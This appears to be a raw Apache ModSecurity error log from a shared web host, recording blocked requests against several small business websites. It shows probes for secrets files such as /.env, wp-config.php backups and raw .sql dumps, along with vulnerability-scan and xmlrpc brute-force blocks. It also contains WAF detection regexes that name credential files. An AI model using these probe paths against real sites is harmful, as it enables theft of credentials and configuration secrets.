[Tue May 26 13:39:45.806476 2026] [security2:error] [pid 536875:tid 537087] [client 45.148.10.95:9716] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/var/www/.env"] [unique_id "ahVVSer_-FTveSGlx1HsFAAAANc"]
[Tue May 26 13:39:45.807978 2026] [security2:error] [pid 536875:tid 537012] [client 45.148.10.95:40006] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/var/www/html/.env"] [unique_id "ahVVSer_-FTveSGlx1HsFQAAAIw"]
[Tue May 26 13:39:45.851724 2026] [security2:error] [pid 544395:tid 544630] [client 45.148.10.95:39958] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/web/.env"] [unique_id "ahVVSRmrs7g3RMCdp8XK5AAAAGk"]
[Tue May 26 13:39:45.956867 2026] [security2:error] [pid 536875:tid 537014] [client 45.148.10.95:40006] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/website/.env"] [unique_id "ahVVSer_-FTveSGlx1HsHQAAAI4"]
[Tue May 26 13:39:45.996320 2026] [security2:error] [pid 544395:tid 544616] [client 45.148.10.95:39920] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "whitesun.in"] [uri "/wp-config.php"] [unique_id "ahVVSRmrs7g3RMCdp8XK8AAAAFs"]
[Tue May 26 13:39:45.998946 2026] [security2:error] [pid 544395:tid 544563] [client 45.148.10.95:39958] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "whitesun.in"] [uri "/wp-config.php.bak"] [unique_id "ahVVSRmrs7g3RMCdp8XK8QAAACY"]
[Tue May 26 13:39:46.012073 2026] [security2:error] [pid 536875:tid 537104] [client 45.148.10.95:40022] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "whitesun.in"] [uri "/wp-config.php.new"] [unique_id "ahVVSur_-FTveSGlx1HsHwAAAOg"]
[Tue May 26 13:39:46.015038 2026] [security2:error] [pid 536875:tid 537106] [client 45.148.10.95:39974] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "whitesun.in"] [uri "/wp-config.php.old"] [unique_id "ahVVSur_-FTveSGlx1HsIQAAAOo"]
[Tue May 26 13:39:46.035782 2026] [security2:error] [pid 544395:tid 544650] [client 45.148.10.95:39864] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/wp-content/mysql.sql"] [unique_id "ahVVShmrs7g3RMCdp8XK9AAAAH0"]
[Tue May 26 13:39:46.735301 2026] [security2:error] [pid 536875:tid 537029] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVSur_-FTveSGlx1HsIgAAAJ0"]
[Tue May 26 13:39:46.862106 2026] [security2:error] [pid 544395:tid 544566] [client 172.86.76.182:63686] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVVShmrs7g3RMCdp8XLAwAAACk"], referer: https://www.cagmedya.com/gizlilik-ve-guvenlik-politikasi/
[Tue May 26 13:39:47.127658 2026] [core:error] [pid 544395:tid 544624] [client 205.210.31.20:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 13:39:47.127683 2026] [core:error] [pid 544395:tid 544624] [client 205.210.31.20:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 13:39:48.329391 2026] [fcgid:warn] [pid 536875:tid 537079] (70014)End of file found: [client 199.45.155.82:55240] mod_fcgid: can't get data from http client
[Tue May 26 13:39:50.469785 2026] [security2:error] [pid 536875:tid 537071] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVTer_-FTveSGlx1HsSgAAAMc"]
[Tue May 26 13:39:51.550964 2026] [security2:error] [pid 544395:tid 544613] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVTxmrs7g3RMCdp8XLUwAAAFg"]
[Tue May 26 13:39:53.040405 2026] [fcgid:warn] [pid 544395:tid 544622] (70014)End of file found: [client 167.94.146.61:55282] mod_fcgid: can't get data from http client
[Tue May 26 13:39:53.337199 2026] [security2:error] [pid 544395:tid 544633] [client 106.192.248.115:62728] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVVURmrs7g3RMCdp8XLcgAAAGw"]
[Tue May 26 13:39:53.337387 2026] [security2:error] [pid 544395:tid 544633] [client 106.192.248.115:62728] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVVURmrs7g3RMCdp8XLcgAAAGw"]
[Tue May 26 13:39:53.421829 2026] [security2:error] [pid 544395:tid 544580] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVUBmrs7g3RMCdp8XLagAAADc"]
[Tue May 26 13:39:53.656588 2026] [security2:error] [pid 544395:tid 544425] [remote 2001:e68:5454:d381:6990:20f1:f8fe:2d59:0] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "kingsclub.in"] [uri "/xmlrpc.php"] [unique_id "ahVVURmrs7g3RMCdp8XLfgAAaB0"]
[Tue May 26 13:39:53.656748 2026] [security2:error] [pid 544395:tid 544629] [client 2001:e68:5454:d381:6990:20f1:f8fe:2d59:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "kingsclub.in"] [uri "/xmlrpc.php"] [unique_id "ahVVURmrs7g3RMCdp8XLfgAAaB0"]
[Tue May 26 13:39:53.748700 2026] [security2:error] [pid 544395:tid 544590] [client 129.222.147.134:40366] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVVURmrs7g3RMCdp8XLewAAAEE"]
[Tue May 26 13:39:53.748896 2026] [security2:error] [pid 544395:tid 544590] [client 129.222.147.134:40366] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVVURmrs7g3RMCdp8XLewAAAEE"]
[Tue May 26 13:39:54.769987 2026] [security2:error] [pid 544395:tid 544632] [client 65.21.124.77:34540] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jailanitradingcompany.com"] [uri "/jtc-website-privacy.php"] [unique_id "ahVVUhmrs7g3RMCdp8XLmQAAAGs"]
[Tue May 26 13:39:55.102298 2026] [security2:error] [pid 544395:tid 544551] [client 65.21.124.77:34648] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jailanitradingcompany.com"] [uri "/jtc-products.php"] [unique_id "ahVVUxmrs7g3RMCdp8XLrQAAABo"]
[Tue May 26 13:39:55.102652 2026] [security2:error] [pid 544395:tid 544567] [client 65.21.124.77:34616] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jailanitradingcompany.com"] [uri "/jtc-about.php"] [unique_id "ahVVUxmrs7g3RMCdp8XLsAAAACo"]
[Tue May 26 13:39:55.102686 2026] [security2:error] [pid 544395:tid 544625] [client 65.21.124.77:34600] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jailanitradingcompany.com"] [uri "/index.php"] [unique_id "ahVVUxmrs7g3RMCdp8XLrwAAAGQ"]
[Tue May 26 13:39:55.105005 2026] [security2:error] [pid 544395:tid 544615] [client 65.21.124.77:34630] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jailanitradingcompany.com"] [uri "/jtc-techdata.php"] [unique_id "ahVVUxmrs7g3RMCdp8XLsgAAAFo"]
[Tue May 26 13:39:55.122185 2026] [security2:error] [pid 544395:tid 544622] [client 65.21.124.77:34692] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/index.php"] [unique_id "ahVVUxmrs7g3RMCdp8XLtwAAAGE"]
[Tue May 26 13:39:55.123570 2026] [security2:error] [pid 544395:tid 544591] [client 65.21.124.77:34700] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/bhavish-interiordesign.php"] [unique_id "ahVVUxmrs7g3RMCdp8XLuQAAAEI"]
[Tue May 26 13:39:55.141804 2026] [security2:error] [pid 544395:tid 544535] [client 65.21.124.77:34770] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bhavisharchitects.com.svijaykumar.in"] [uri "/index.php"] [unique_id "ahVVUxmrs7g3RMCdp8XLvQAAAAo"]
[Tue May 26 13:39:55.143496 2026] [security2:error] [pid 544395:tid 544573] [client 65.21.124.77:34778] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bhavisharchitects.com.svijaykumar.in"] [uri "/bhavish-interiordesign.php"] [unique_id "ahVVUxmrs7g3RMCdp8XLvwAAADA"]
[Tue May 26 13:39:55.221408 2026] [security2:error] [pid 544395:tid 544609] [client 65.21.124.77:34848] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.jailanitradingcompany.svijaykumar.in"] [uri "/index.php"] [unique_id "ahVVUxmrs7g3RMCdp8XLwQAAAFQ"]
[Tue May 26 13:39:55.221461 2026] [security2:error] [pid 544395:tid 544558] [client 65.21.124.77:34796] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.jailanitradingcompany.svijaykumar.in"] [uri "/jtc-about.php"] [unique_id "ahVVUxmrs7g3RMCdp8XLwgAAACE"]
[Tue May 26 13:39:55.223447 2026] [security2:error] [pid 544395:tid 544563] [client 65.21.124.77:34524] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/bhavish-architecture.php"] [unique_id "ahVVUxmrs7g3RMCdp8XLwwAAACY"]
[Tue May 26 13:39:55.233010 2026] [security2:error] [pid 544395:tid 544549] [client 65.21.124.77:34836] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.jailanitradingcompany.svijaykumar.in"] [uri "/jtc-products.php"] [unique_id "ahVVUxmrs7g3RMCdp8XLxgAAABg"]
[Tue May 26 13:39:55.251452 2026] [security2:error] [pid 544395:tid 544623] [client 65.21.124.77:34514] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bhavisharchitects.com.svijaykumar.in"] [uri "/bhavish-architecture.php"] [unique_id "ahVVUxmrs7g3RMCdp8XLyAAAAGI"]
[Tue May 26 13:39:55.274457 2026] [security2:error] [pid 544395:tid 544554] [client 65.21.124.77:34628] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jailanitradingcompany.com"] [uri "/jtc-website-terms.php"] [unique_id "ahVVUxmrs7g3RMCdp8XLyQAAAB0"]
[Tue May 26 13:39:55.296796 2026] [security2:error] [pid 536875:tid 537116] [client 65.21.124.77:34714] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/bhavish-services-interiordesign.php"] [unique_id "ahVVU-r_-FTveSGlx1HsiAAAAPQ"]
[Tue May 26 13:39:55.296912 2026] [security2:error] [pid 544395:tid 544648] [client 65.21.124.77:34722] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/bhavish-quote.php"] [unique_id "ahVVUxmrs7g3RMCdp8XLygAAAHs"]
[Tue May 26 13:39:55.296979 2026] [security2:error] [pid 536875:tid 537066] [client 65.21.124.77:34654] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/bhavish-contact.php"] [unique_id "ahVVU-r_-FTveSGlx1HshwAAAMI"]
[Tue May 26 13:39:55.314566 2026] [security2:error] [pid 544395:tid 544578] [client 65.21.124.77:34782] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bhavisharchitects.com.svijaykumar.in"] [uri "/bhavish-services-architecture.php"] [unique_id "ahVVUxmrs7g3RMCdp8XLywAAADU"]
[Tue May 26 13:39:55.337351 2026] [security2:error] [pid 544395:tid 544547] [client 65.21.124.77:34766] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bhavisharchitects.com.svijaykumar.in"] [uri "/bhavish-services-interiordesign.php"] [unique_id "ahVVUxmrs7g3RMCdp8XLzAAAABY"]
[Tue May 26 13:39:55.338039 2026] [security2:error] [pid 536875:tid 537111] [client 65.21.124.77:34738] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bhavisharchitects.com.svijaykumar.in"] [uri "/bhavish-services-designandbuild.php"] [unique_id "ahVVU-r_-FTveSGlx1HsiQAAAO8"]
[Tue May 26 13:39:55.380344 2026] [security2:error] [pid 536875:tid 537062] [client 65.21.124.77:34820] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.jailanitradingcompany.svijaykumar.in"] [uri "/jtc-techdata.php"] [unique_id "ahVVU-r_-FTveSGlx1HsiwAAAL4"]
[Tue May 26 13:39:55.393402 2026] [security2:error] [pid 536875:tid 537075] [client 65.21.124.77:34798] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.jailanitradingcompany.svijaykumar.in"] [uri "/jtc-contact.php"] [unique_id "ahVVU-r_-FTveSGlx1HsjAAAAMs"]
[Tue May 26 13:39:55.398601 2026] [security2:error] [pid 544395:tid 544528] [client 65.21.124.77:34556] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.jailanitradingcompany.svijaykumar.in"] [uri "/jtc-enquiry.php"] [unique_id "ahVVUxmrs7g3RMCdp8XLzwAAAAM"]
[Tue May 26 13:39:55.436075 2026] [security2:error] [pid 544395:tid 544564] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVUhmrs7g3RMCdp8XLqgAAACc"]
[Tue May 26 13:39:55.447277 2026] [security2:error] [pid 536875:tid 537096] [client 65.21.124.77:34574] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jailanitradingcompany.com"] [uri "/jtc-contact.php"] [unique_id "ahVVU-r_-FTveSGlx1HsjgAAAOA"]
[Tue May 26 13:39:55.459587 2026] [security2:error] [pid 544395:tid 544641] [client 65.21.124.77:34668] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/bhavish-services-designandbuild.php"] [unique_id "ahVVUxmrs7g3RMCdp8XL0QAAAHQ"]
[Tue May 26 13:39:55.476691 2026] [security2:error] [pid 544395:tid 544642] [client 65.21.124.77:34752] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bhavisharchitects.com.svijaykumar.in"] [uri "/bhavish-contact.php"] [unique_id "ahVVUxmrs7g3RMCdp8XL0gAAAHU"]
[Tue May 26 13:39:55.539431 2026] [security2:error] [pid 544395:tid 544646] [client 65.21.124.77:34866] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jailanitradingcompany.com"] [uri "/jtc-website-disclaimer.php"] [unique_id "ahVVUxmrs7g3RMCdp8XL0wAAAHk"]
[Tue May 26 13:39:55.562024 2026] [security2:error] [pid 536875:tid 537042] [client 65.21.124.77:34854] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.jailanitradingcompany.svijaykumar.in"] [uri "/jtc-website-terms.php"] [unique_id "ahVVU-r_-FTveSGlx1HsjwAAAKo"]
[Tue May 26 13:39:55.607874 2026] [security2:error] [pid 544395:tid 544628] [client 65.21.124.77:34572] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jailanitradingcompany.com"] [uri "/jtc-enquiry.php"] [unique_id "ahVVUxmrs7g3RMCdp8XL1gAAAGc"]
[Tue May 26 13:39:55.639853 2026] [security2:error] [pid 544395:tid 544532] [client 65.21.124.77:34904] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/2026a-CholaBoardRoom.php"] [unique_id "ahVVUxmrs7g3RMCdp8XL1wAAAAc"]
[Tue May 26 13:39:55.641681 2026] [security2:error] [pid 544395:tid 544636] [client 65.21.124.77:34882] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/bhavish-aboutus.php"] [unique_id "ahVVUxmrs7g3RMCdp8XL2AAAAG8"]
[Tue May 26 13:39:55.642918 2026] [security2:error] [pid 544395:tid 544577] [client 65.21.124.77:34888] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/2025a-KaizenServApt.php"] [unique_id "ahVVUxmrs7g3RMCdp8XL2QAAADQ"]
[Tue May 26 13:39:55.706110 2026] [security2:error] [pid 536875:tid 537014] [client 65.21.124.77:34812] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.jailanitradingcompany.svijaykumar.in"] [uri "/jtc-website-disclaimer.php"] [unique_id "ahVVU-r_-FTveSGlx1HskgAAAI4"]
